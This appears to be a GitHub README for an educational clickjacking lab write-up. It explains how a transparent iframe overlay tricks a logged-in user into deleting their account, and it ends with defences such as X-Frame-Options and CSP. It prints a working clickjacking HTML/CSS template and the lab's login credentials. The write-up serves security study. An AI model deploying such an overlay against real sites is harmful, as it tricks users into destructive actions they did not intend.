Skip to content

Latest commit

 

History

History
75 lines (55 loc) · 2.43 KB

File metadata and controls

75 lines (55 loc) · 2.43 KB

Clickjacking Exploit with CSRF Token Protection

This repository contains the project files and documentation for analyzing and exploiting basic clickjacking techniques with CSRF (Cross-Site Request Forgery) token protection. The project demonstrates how to exploit clickjacking vulnerabilities and explores methods to defend against them.


📜 Problem Statement

The task is to craft an HTML exploit to manipulate a user's interaction on a decoy website, tricking them into deleting their account on a vulnerable site. The goal is to bypass CSRF token protection using a transparent iframe overlay positioned over the target button.


🛠 Project Objectives

  1. Understand clickjacking techniques:
    • Learn how iframe overlays can be maliciously used.
  2. Analyze CSRF token protection mechanisms:
    • Study vulnerabilities in token-based protections.
  3. Craft an HTML exploit:
    • Develop an iframe-based attack to bypass user awareness.
  4. Demonstrate exploit delivery:
    • Test the crafted exploit in a controlled environment to achieve account deletion.

🚀 Steps to Reproduce

1. Log in to the Vulnerable Application

  • Use the provided credentials:
    • Username: wiener
    • Password: Peter
  • Access the "Delete account" section of the target website.

2. Create the Exploit

  • Use the following HTML template to craft the exploit:
    <style>
        iframe {
            position: relative;
            width: 1000px;
            height: 700px;
            opacity: 0.000001;
            z-index: 2;
        }
        div {
            position: absolute;
            top: 515px;
            left: 60px;
            z-index: 1;
        }
    </style>
    <div>Click me</div>
    <iframe src="YOUR-LAB-ID"></iframe>

📖 Key Learnings

Technical Insights:

  1. Understanding iframe manipulation for clickjacking attacks.

    • The role of CSRF tokens in securing user actions.
    • Practical application of HTML and CSS in crafting exploits.
  2. Defense Mechanisms:

    • Use of X-Frame-Options headers to prevent embedding in iframes.
    • Implementing Content Security Policies (CSP) to restrict iframe behavior.
    • Robust validation of CSRF tokens to enhance security.

🔐 Disclaimer

This repository is strictly for educational purposes. It is intended to provide insights into web security vulnerabilities and methods to mitigate such risks. Any misuse of the content for unauthorized purposes is strictly prohibited.